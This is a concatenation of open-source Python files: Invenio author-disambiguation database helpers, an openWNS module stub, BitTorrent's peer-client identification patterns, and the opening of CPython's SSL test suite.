ext_ids_field = (str(table), ref, rec), str(table) + '__j', str(table) + '__k'
ext_ids = chain(*get_grouped_records(*ext_ids_field).values())
for ext_id in ext_ids:
if ext_id.startswith('ORCID:'):
try:
return [re.search(r"0000-000\d-\d{4}-\d{3}[\dX]", ext_id).group()]
except AttributeError:
pass
def get_kaken_id_of_signature(sig):
"""
Gets the external identifier of KAKEN system for the given signature.
The field to check is either '100__j' or '700__j'
and the prefix is 'KAKEN-'
@param sig: signature (bibref_table, bibref_value, bibrec)
type sig: tuple (int, int, int)
@return KAKEN external identifier
@rtype: str
"""
table, ref, rec = sig
ext_ids_field = (str(table), ref, rec), str(table) + '__j'
ext_ids = get_grouped_records(*ext_ids_field).values()[0]
for ext_id in ext_ids:
if ext_id.startswith('KAKEN-'):
try:
return [re.search(r"\d{8}", ext_id).group()]
except AttributeError:
pass
def get_author_names_from_db(pid): # get_person_db_names_set
'''
Gets the set of names associated to the given author.
@param pid: author identifier
@type pid: int
@return: author names
@rtype: list [(str),]
'''
names = get_names_of_author(pid)
if not names:
return list()
return zip(zip(*names)[0])
def get_all_valid_bibrecs():
'''
Gets all valid bibrecs.
@return: paper identifiers
@rtype: list [int,]
'''
return perform_request_search(c=bconfig.LIMIT_TO_COLLECTIONS, rg=0)
def get_name_by_bibref(ref): # get_name_by_bibrecref
'''
Finds the author name based on the given bibref.
@param ref: bibref (bibref_table, bibref_value)
@type ref: tuple (int, int)
@return: name
@rtype: str
'''
if MARC_100_700_CACHE:
return _get_name_by_bibref_from_cache(ref)
else:
return _get_name_from_db_by_bibref(ref)
def get_last_rabbit_runtime(): # fetch_bibauthorid_last_update
'''
Gets last runtime of rabbit.
@return: last runtime of rabbit
@rtype: datetime.datetime
'''
log = get_user_logs(userinfo='daemon', action='PID_UPDATE', only_most_recent=True)
try:
last_update = log[0][2]
except IndexError:
last_update = datetime.datetime(year=1, month=1, day=1)
return last_update
def get_db_time(): # get_sql_time
'''
Gets the time according to the database.
@return: db time
@rtype: datetime.datetime
'''
return run_sql("select now()")[0][0]
def destroy_partial_marc_caches():
'''
Destroys marc caches.
'''
global MARC_100_700_CACHE
MARC_100_700_CACHE = None
def _split_signature_string(sig_str):
'''
Splits a signature from a string form to its parts.
@param sig_str: signature in a string form e.g. '100:7531,9024'
@type sig_str: str
@return: signature (bibref_table, bibref_value, bibrec)
@rtype: tuple (int, int, int)
'''
bibref, rec = sig_str.split(",")
rec = int(rec)
table, ref = bibref.split(":")
ref = int(ref)
return (table, ref, rec)
def _get_sqlstr_from_set(items, f=lambda x: x): # list_2_SQL_str
"""
Creates a string from a set after transforming each item
with a function.
@param items: set of items
@type items: X
@param f: function to be applied to each item
@type f: func (x->str)
@return: "(f(x1), f(x2), ..., f(xn))" where x1,x2,...,xn elements of 'items'
@rtype: str
"""
strs = (str(f(x)) for x in items)
return "(%s)" % ", ".join(strs)
def get_paper_access_right(acc): # resolve_paper_access_right
'''
Given an access right key, resolves to the corresponding access right
value. If asked for a wrong/not present key falls back to the minimum
permission.
@param acc: access right key
@type acc: str or int
@return: access right value
@rtype: str or int
'''
access_dict = {bconfig.CLAIMPAPER_VIEW_PID_UNIVERSE: 0,
bconfig.CLAIMPAPER_CLAIM_OWN_PAPERS: 25,
bconfig.CLAIMPAPER_CLAIM_OTHERS_PAPERS: 50}
if isinstance(acc, str):
try:
return access_dict[acc]
except:
return 0
inverse_dict = dict([[v, k] for k, v in access_dict.items()])
lower_accs = [a for a in inverse_dict.keys() if a <= acc]
try:
return inverse_dict[max(lower_accs)]
except:
return bconfig.CLAIMPAPER_VIEW_PID_UNIVERSE
def get_grouped_records(sig, *args):
'''
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (int, int, int)
@param args: tags
@type args: tuple (str,)
'''
if MARC_100_700_CACHE:
return _get_grouped_records_using_marc_caches(sig, *args)
else:
return _get_grouped_records_from_db(sig, *args)
def _get_grouped_records_using_marc_caches(sig, *args): # _get_grouped_records_using_caches
'''
Gets the records from marc caches which are grouped together with the paper
specified in the given signature and carry a tag from 'args'.
@param sig: signature (bibref_table, bibref_value, bibrec)
@type sig: tuple (int, int, int)
@param args: tags
@type args: tuple (str,)
@return: {tag: [extracted_value,]}
@rtype: dict {str: [str,]}
'''
table, ref, rec = sig
try:
c = MARC_100_700_CACHE['brb%s' % str(table)][rec]
fn = c['id'][ref]
except KeyError:
if rec in MARC_100_700_CACHE['records']:
return dict()
else:
return _get_grouped_records_from_db(sig, *args)
if not fn: # or len(fn)>1
# If len(fn) > 1 it's BAD: the same signature is at least twice on the same paper.
# But after all, that's the mess we find in the database, so let's leave it there.
return dict((tag, list()) for tag in args)
ids = set(chain(*(c['fn'][i] for i in fn)))
tuples = [MARC_100_700_CACHE['b%s' % str(table)][i] for i in ids]
res = defaultdict(list)
for t in tuples:
present = [tag for tag in args if tag in t[0]]
# assert len(present) <= 1
if present:
tag = present[0]
res[tag].append(t[1])
for tag in args:
if tag not in res.keys():
res[tag] = list()
return dict(res)
def populate_table(table_name, column_names, values, empty_table_first=True):
'''
Populates the specified table which has the specified column names with the
given list of values. If 'empty_table_first' flag is enabled it truncates
the table before populating it.
@param table_name: name of the table to populate
@type table_name: str
@param column_names: column names of the table
@type column_names: list [str,]
@param values: values to be inserted
@type values: list
@param empty_table_first: truncate the table before populating it
@type empty_table_first: bool
'''
values_len = len(values)
column_num = len(column_names)
values_tuple_size = list()
assert values_len % column_num == 0, 'Trying to populate table %s. Wrong number of arguments passed.' % table_name
for i in range(int(values_len / column_num)):
# it keeps the size for each tuple of values
values_tuple_size.append(sum([len(str(i)) for i in values[i * column_num:i * column_num + column_num]]))
if empty_table_first:
_truncate_table(table_name)
populate_table_with_limit(table_name, column_names, values, values_tuple_size)
def populate_table_with_limit(table_name, column_names, values, values_tuple_size,
max_insert_size=CFG_BIBAUTHORID_SEARCH_ENGINE_MAX_DATACHUNK_PER_INSERT_DB_QUERY):
'''
Populates the specified table which has the specified column names with the
given list of values. It limits the datachunk size per single insert query
according to the given threshold. Bigger threshold means better
performance. Nevertheless if it is too big there is the risk that the mysql
connection timeout will run out and connection with the db will be lost.
@param table_name: name of the table to populate
@type table_name: str
@param column_names: column names of the table
@type column_names: list [str,]
@param values: values to be inserted
@type values: list
@param values_tuple_size: size of each tuple of values
@type values_tuple_size: list [int,]
@param max_insert_size: max datachunk size to be inserted to the table per single insert query
@type max_insert_size: int
'''
column_num = len(column_names)
summ = 0
start = 0
for i in range(len(values_tuple_size)):
if summ + values_tuple_size[i] <= max_insert_size:
summ += values_tuple_size[i]
continue
summ = values_tuple_size[i]
flush_data_to_db(table_name, column_names, values[start:(i - 1) * column_num])
start = (i - 1) * column_num
flush_data_to_db(table_name, column_names, values[start:])
#
#
# other stuff ###
#
#
#
#
# not used functions ###
#
#
def remove_not_claimed_papers_from_author(pid): # del_person_not_manually_claimed_papers
'''
Deletes papers which have not been manually claimed or rejected
from the given author.
@param pid: author
@type pid: int
'''
run_sql("""delete from aidPERSONIDPAPERS
where (flag <> -2 and flag <> 2)
and personid=%s""", (pid,) )
def remove_all_signatures_from_authors(pids): # remove_personid_papers
'''
Deletes all signatures from the given authors.
@param pids: authors
@type pids: list [int,]
'''
if pids:
pids_sqlstr = _get_sqlstr_from_set(pids)
run_sql("""delete from aidPERSONIDPAPERS
where personid in %s"""
% pids_sqlstr)
def get_authors_by_surname(surname, limit_to_recid=False): # find_pids_by_name
'''
Gets all authors who carry records with the specified surname.
@param surname: author surname
@type surname: str
@return: author identifier and name set((pid, name),)
@rtype: set set((int, str),)
'''
if not limit_to_recid:
select_query = "select personid, name "
else:
select_query = "select personid "
return set(run_sql(select_query +
"""from aidPERSONIDPAPERS
where name like %s""",
(surname + ',%',)))
# could be useful to optimize rabbit. Still unused and untested, Watch out!
def get_author_to_signatures_mapping(): # get_bibrecref_to_pid_dictuonary
'''
Gets a mapping which associates signatures with the set of authors who
carry a record with that signature.
@return: mapping
@rtype: dict {(str, int, int): set(int,)}
'''
mapping = dict()
authors_sigs = _select_from_aidpersonidpapers_where(select=['personid', 'bibref_table', 'bibref_value', 'bibrec'])
for i in authors_sigs:
mapping.setdefault(i[1:], set()).add(i[0])
return mapping
def get_author_data_associations_for_author(pid): # get_specific_personid_full_data
'''
Gets all author-data associations for the given author.
@param pid: author identifier
@type pid: int
@return: author-data associations ((pid, tag, data, opt1, opt2, opt3),)
@rtype: tuple ((int, str, str, int, int, str),)
'''
return _select_from_aidpersoniddata_where(select=['personid', 'tag', 'data', 'opt1', 'opt2', 'opt3'], pid=pid)
def get_user_id_of_author(pid): # get_uids_by_pids
'''
Gets the user identifier for the given author.
@param pid: author identifier
@type pid: int
@return: user identifier
@rtype: tuple ((str),)
'''
return _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='uid')
def restore_author_paper_associations(): # restore_personids
'''
Restores the author-data and author-paper association tables
(aidPERSONIDDATA, aidPERSONIDPAPERS) from the last saved copy of the
back-up tables (aidPERSONIDDATA_copy, aidPERSONIDPAPERS_copy).
'''
_truncate_table('aidPERSONIDDATA')
run_sql("""insert into `aidPERSONIDDATA`
select *
from `aidPERSONIDDATA_copy`""")
_truncate_table('aidPERSONIDPAPERS')
run_sql("""insert into `aidPERSONIDPAPERS`
select *
from `aidPERSONIDPAPERS_copy`""")
def check_claim_inspireid_contradiction():
'''
It examines if the merger introduced any error to the author-paper
asociations (e.g. claimed papers are assigned to a differnt author,
loss of signatures, creation of new signatures). It presumes that
copy_personid was called before the merger.
@return: merger errors are found
@rtype: bool
'''
inspire_ids10x = run_sql("""select id
from bib10x
where tag='100__i'""")
refs10x = set(i[0] for i in run_sql("""select id
from bib10x
where tag='100__a'"""))
if inspire_ids10x:
inspire_ids10x_sqlstr = _get_sqlstr_from_set(inspire_ids10x, lambda x: str(x[0]))
inspire_ids10x = run_sql("""select id_bibxxx, id_bibrec, field_number
from bibrec_bib10x
where id_bibxxx in %s"""
% inspire_ids10x_sqlstr)
inspire_ids10x = ((row[0], [(ref, rec) for ref, rec in run_sql(
"""select id_bibxxx, id_bibrec
from bibrec_bib10x
where id_bibrec='%s'
and field_number='%s'"""
% row[1:])
if ref in refs10x])
for row in inspire_ids10x)
inspire_ids70x = run_sql("""select id
from bib70x
where tag='700__i'""")
refs70x = set(i[0] for i in run_sql("""select id
from bib70x
where tag='700__a'"""))
if inspire_ids70x:
inspire_ids70x_sqlstr = _get_sqlstr_from_set(inspire_ids70x, lambda x: str(x[0]))
inspire_ids70x = run_sql("""select id_bibxxx, id_bibrec, field_number
from bibrec_bib70x
where id_bibxxx in %s"""
% inspire_ids70x_sqlstr)
inspire_ids70x = ((row[0], [(ref, rec) for ref, rec in run_sql(
"""select id_bibxxx, id_bibrec
from bibrec_bib70x
where id_bibrec='%s'
and field_number='%s'"""
% (row[1:]))
if ref in refs70x])
for row in inspire_ids70x)
# [(iids, [bibs])]
inspired = list(chain(((iid, list(set(('100',) + bib for bib in bibs))) for iid, bibs in inspire_ids10x),
((iid, list(set(('700',) + bib for bib in bibs))) for iid, bibs in inspire_ids70x)))
assert all(len(x[1]) == 1 for x in inspired)
inspired = ((k, map(itemgetter(0), map(itemgetter(1), d)))
for k, d in groupby(sorted(inspired, key=itemgetter(0)), key=itemgetter(0)))
# [(inspireid, [bibs])]
inspired = [([(run_sql("""select personid
from aidPERSONIDPAPERS
where bibref_table like %s
and bibref_value=%s
and bibrec=%s
and flag='2'""", bib), bib)
for bib in cluster[1]], cluster[0])
for cluster in inspired]
# [([([pid], bibs)], inspireid)]
for cluster, iid in inspired:
pids = set(chain.from_iterable(imap(itemgetter(0), cluster)))
if len(pids) > 1:
print "InspireID: %s links the following papers:" % iid
print map(itemgetter(1), cluster)
print "More than one personid claimed them:"
print list(pids)
print
continue
if len(pids) == 0:
# not even one paper with this inspireid has been
# claimed, screw it
continue
pid = list(pids)[0][0]
# The last step is to check all non-claimed papers for being
# claimed by the person on some different signature.
problem = (_select_from_aidpersonidpapers_where(select=['bibref_table', 'bibref_value', 'bibrec'], pid=pid, rec=bib[2], flag=2)
for bib in (bib for lpid, bib in cluster if not lpid))
problem = list(chain.from_iterable(problem))
if problem:
print "A personid has claimed a paper from an inspireid cluster and a contradictory paper."
print "Personid %d" % pid
print "Inspireid cluster %s" % str(map(itemgetter(1), cluster))
print "Contradicting claims: %s" % str(problem)
print
def remove_clusters_except(excl_surnames): # remove_results_outside
'''
Deletes all disambiguation algorithm result records except records who are
assoociated with the specified surnames.
@param excl_surnames: author surnames
@type excl_surnames: list
'''
excl_surnames = frozenset(excl_surnames)
surnames = frozenset(name[0].split(".")[0] for name in run_sql("""select personid
from aidRESULTS"""))
for surname in surnames - excl_surnames:
run_sql("""delete from aidRESULTS
where personid like %s""",
(surname + '.%%',))
def get_clusters(): # get_full_results
'''
Gets all disambiguation algorithm result records.
@return: disambiguation algorithm result records ((name, bibref_table, bibref_value, bibrec),)
@rtype: tuple ((str, str, int, int),)
'''
return run_sql("""select personid, bibref_table, bibref_value, bibrec
from aidRESULTS""")
def get_existing_papers_and_refs(table, recs, refs): # get_bibrefrec_subset
'''
From the specified papers and bibref values it gets the existing ones.
@param table: bibref_table
@type table: int
@param recs: paper identifiers
@type recs: list [int,]
@param refs: bibref values
@type refs: list [int,]
@return: paper identifiers and bibref values set((rec, bibref_value),)
@rtype: set set((int, int),)
'''
table = "bibrec_bib%sx" % str(table)[:-1]
contents = run_sql("""select id_bibrec, id_bibxxx
from %s"""
% table)
recs = set(recs)
refs = set(refs)
# there are duplicates
return set(ifilter(lambda x: x[0] in recs and x[1] in refs, contents))
#
# BibRDF utilities. To be refactored and ported to bibauthorid_bibrdfinterface #
#
def get_all_personids_with_orcid():
pids = run_sql("select personid from aidPERSONIDDATA where tag='extid:ORCID'")
pids = set(x[0] for x in pids)
return pids
def get_records_of_authors(personids_set):
authors = _get_sqlstr_from_set(personids_set)
recids = run_sql("select bibrec from aidPERSONIDPAPERS where personid in %s" % authors)
recids = set(x[0] for x in recids)
return recids
def author_exists(personid):
return any((bool(run_sql("select * from aidPERSONIDDATA where personid=%s limit 1", (personid,))),
bool(run_sql("select * from aidPERSONIDPAPERS where personid=%s limit 1", (personid,)))))
#
#
# aidTOKEN ###
#
#
# ********** errors **********#
class TokenExistingException(Exception):
"""We don't support updating the token.
When sb wants to update, we should raise an exception.
"""
pass
# ********** setters **********#
def set_token(personid, token):
"""Set the ORCID token for an author.
This is the token which is valid for 20 years.
"""
if get_token(personid):
# there was a token, but we can update it
# currently it is not supported
run_sql("update aidTOKEN set `token`=%s where personid=%s",
(token, personid))
try:
raise TokenExistingException
except:
register_exception(subject="""The token in aidTOKEN was updated.
This behaviour was not expected.""")
else:
# default behaviour
change = 1
run_sql("insert into aidTOKEN values \
(%s, %s, %s)", (personid, token, change))
def delete_token(personid):
"""Delete a token for an author.
It should be run when the token expires.
"""
run_sql("delete from aidTOKEN where personid=%s", (personid,))
def trigger_aidtoken_change(personid, change):
"""Trigger the change in aidTOKEN table on."""
run_sql("update aidTOKEN set was_changed=%s where personid=%s",
(change, personid))
# ********** getters **********#
def get_token(personid):
"""Get the ORCID token for an author."""
return run_sql("select personid, token, was_changed from aidTOKEN where personid=%s", (personid,))
def get_all_tokens():
"""Get the ORCID token for every author."""
return run_sql("select personid, token, was_changed from aidTOKEN")
| gpl-2.0 |
creasyw/IMTAphy | framework/dllbase/PyConfig/dll/DLL.py | 1 | 1326 | ###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2007
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 5, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22242
# email: info@openwns.org
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openwns.module import Module
class DLL(Module):
def __init__(self):
super(DLL, self).__init__("dll", "dllbase")
| gpl-2.0 |
bbc/kamaelia | Sketches/RJL/bittorrent/BitTorrent/BitTorrent/ClientIdentifier.py | 4 | 8094 | # The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# Written by Matt Chisholm
# Client list updated by Ed Savage-Jones - May 28th 2005
import re
v64p = '[\da-zA-Z.-]{3}'
matches = (
('-AZ(?P<version>\d+)-+.+$' , "Azureus" ),
('M(?P<version>\d-\d-\d)--.+$' , "BitTorrent" ),
('T(?P<version>%s)0?-+.+$'%v64p , "BitTornado" ),
('-UT(?P<version>[\dA-F]+)-+.+$' , u"\xb5Torrent" ),
('-TS(?P<version>\d+)-+.+$' , "TorrentStorm" ),
('exbc(?P<bcver>.+)LORD.+$' , "BitLord" ),
('exbc(?P<bcver>[^-][^-]+)(?!---).+$', "BitComet" ),
('-BC0(?P<version>\d+)-.+$' , "BitComet" ),
('FUTB(?P<bcver>.+).+$' , "BitComet Mod1" ),
('xUTB(?P<bcver>.+).+$' , "BitComet Mod2" ),
('A(?P<version>%s)-+.+$'%v64p , "ABC" ),
('S(?P<version>%s)-+.+$'%v64p , "Shadow's" ),
(chr(0)*12 + 'aa.+$' , "Experimental 3.2.1b2" ),
(chr(0)*12 + '.+$' , "BitTorrent (obsolete)"),
('-G3.+$' , "G3Torrent" ),
('-[Ll][Tt](?P<version>\d+)-+.+$' , "libtorrent" ),
('Mbrst(?P<version>\d-\d-\d).+$' , "burst!" ),
('eX.+$' , "eXeem" ),
('\x00\x02BS.+(?P<strver>UDP0|HTTPBT)$', "BitSpirit v2" ),
('\x00[\x02|\x00]BS.+$' , "BitSpirit v2" ),
('.*(?P<strver>UDP0|HTTPBT)$' , "BitSpirit" ),
('-BOWP?(?P<version>[\dA-F]+)-.+$', "Bits on Wheels" ),
('(?P<rsver>.+)RSAnonymous.+$' , "Rufus Anonymous" ),
('(?P<rsver>.+)RS.+$' , "Rufus" ),
('-ML(?P<version>(\d\.)+\d)(?:\.(?P<strver>CVS))?-+.+$',"MLDonkey"),
('346------.+$' , "TorrentTopia 1.70" ),
('OP(?P<strver>\d{4}).+$' , "Opera" ),
('-KT(?P<version>\d+)(?P<rc>R\d+)-+.+$', "KTorrent" ),
# Unknown but seen in peer lists:
('-S(?P<version>10059)-+.+$' , "S (unknown)" ),
('-TR(?P<version>\d+)-+.+$' , "TR (unknown)" ),
('S\x05\x07\x06\x00{7}.+' , "S 576 (unknown)" ),
# Clients I've never actually seen in a peer list:
('exbc..---.+$' , "BitVampire 1.3.1" ),
('-BB(?P<version>\d+)-+.+$' , "BitBuddy" ),
('-CT(?P<version>\d+)-+.+$' , "CTorrent" ),
('-MT(?P<version>\d+)-+.+$' , "MoonlightTorrent" ),
('-BX(?P<version>\d+)-+.+$' , "BitTorrent X" ),
('-TN(?P<version>\d+)-+.+$' , "TorrentDotNET" ),
('-SS(?P<version>\d+)-+.+$' , "SwarmScope" ),
('-XT(?P<version>\d+)-+.+$' , "XanTorrent" ),
('U(?P<version>\d+)-+.+$' , "UPnP NAT Bit Torrent" ),
('-AR(?P<version>\d+)-+.+$' , "Arctic" ),
('(?P<rsver>.+)BM.+$' , "BitMagnet" ),
('BG(?P<version>\d+).+$' , "BTGetit" ),
('-eX(?P<version>[\dA-Fa-f]+)-.+$',"eXeem beta" ),
('Plus12(?P<rc>[\dR]+)-.+$' , "Plus! II" ),
('XBT(?P<version>\d+)[d-]-.+$' , "XBT" ),
('-ZT(?P<version>\d+)-+.+$' , "ZipTorrent" ),
('-BitE\?(?P<version>\d+)-.+$' , "BitEruct" ),
('O(?P<version>%s)-+.+$'%v64p , "Osprey Permaseed" ),
# Guesses based on Rufus source code, never seen in the wild:
('-BS(?P<version>\d+)-+.+$' , "BTSlave" ),
('-SB(?P<version>\d+)-+.+$' , "SwiftBit" ),
('-SN(?P<version>\d+)-+.+$' , "ShareNET" ),
('-bk(?P<version>\d+)-+.+$' , "BitKitten" ),
('-SZ(?P<version>\d+)-+.+$' , "Shareaza" ),
('-MP(?P<version>\d+)-+.+$' , "MooPolice" ),
('Deadman Walking-.+$' , "Deadman" ),
('270------.+$' , "GreedBT 2.7.0" ),
('XTORR302.+$' , "TorrenTres 0.0.2" ),
('turbobt(?P<version>\d\.\d).+$' , "TurboBT" ),
('DansClient.+$' , "XanTorrent" ),
('-PO(?P<version>\d+)-+.+$' , "PO (unknown)" ),
('-UR(?P<version>\d+)-+.+$' , "UR (unknown)" ),
# Patterns that should be executed last
('.*Azureus.*' , "Azureus 2.0.3.2" ),
)
matches = [(re.compile(pattern, re.DOTALL), name) for pattern, name in matches]
unknown_clients = {}
def identify_client(peerid, log=None):
client = 'unknown'
version = ''
for pat, name in matches:
m = pat.match(peerid)
if m:
client = name
d = m.groupdict()
if d.has_key('version'):
version = d['version']
version = version.replace('-','.')
if version.find('.') >= 0:
version = ''.join(version.split('.'))
version = list(version)
for i,c in enumerate(version):
if '0' <= c <= '9':
version[i] = c
elif 'A' <= c <= 'Z':
version[i] = str(ord(c) - 55)
elif 'a' <= c <= 'z':
version[i] = str(ord(c) - 61)
elif c == '.':
version[i] = '62'
elif c == '-':
version[i] = '63'
else:
break
version = '.'.join(version)
elif d.has_key('bcver'):
bcver = d['bcver']
version += str(ord(bcver[0])) + '.'
if len(bcver) > 1:
version += str(ord(bcver[1])/10)
version += str(ord(bcver[1])%10)
elif d.has_key('rsver'):
rsver = d['rsver']
version += str(ord(rsver[0])) + '.'
if len(rsver) > 1:
version += str(ord(rsver[1])/10) + '.'
version += str(ord(rsver[1])%10)
if d.has_key('strver'):
if d['strver'] is not None:
version += d['strver']
if d.has_key('rc'):
rc = 'RC ' + d['rc'][1:]
if version:
version += ' '
version += rc
break
if client == 'unknown':
# identify Shareaza 2.0 - 2.1
if len(peerid) == 20 and chr(0) not in peerid[:15]:
for i in range(16,20):
if ord(peerid[i]) != (ord(peerid[i - 16]) ^ ord(peerid[31 - i])):
break
else:
client = "Shareaza"
if log is not None and 'unknown' in client:
if not unknown_clients.has_key(peerid):
unknown_clients[peerid] = True
log.write('%s\n'%peerid)
log.write('------------------------------\n')
return client, version
| apache-2.0 |
yawnosnorous/python-for-android | python3-alpha/python3-src/Lib/test/test_ssl.py | 46 | 71268 | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = [
ssl.PROTOCOL_SSLv3,
ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1
]
if hasattr(ssl, 'PROTOCOL_SSLv2'):
PROTOCOLS.append(ssl.PROTOCOL_SSLv2)
HOST = support.HOST
data_file = lambda name: os.path.join(os.path.dirname(__file__), name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
#ssl.PROTOCOL_SSLv2
ssl.PROTOCOL_SSLv23
ssl.PROTOCOL_SSLv3
ssl.PROTOCOL_TLSv1
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
self.assertIn(ssl.HAS_SNI, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
try:
ssl.RAND_egd(1)
except TypeError:
pass
else:
print("didn't raise TypeError")
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 2.0
self.assertLess(n, 0x20000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 2)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by OpenSSL, the format might change
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
ss = ssl.wrap_socket(s)
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
s = ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
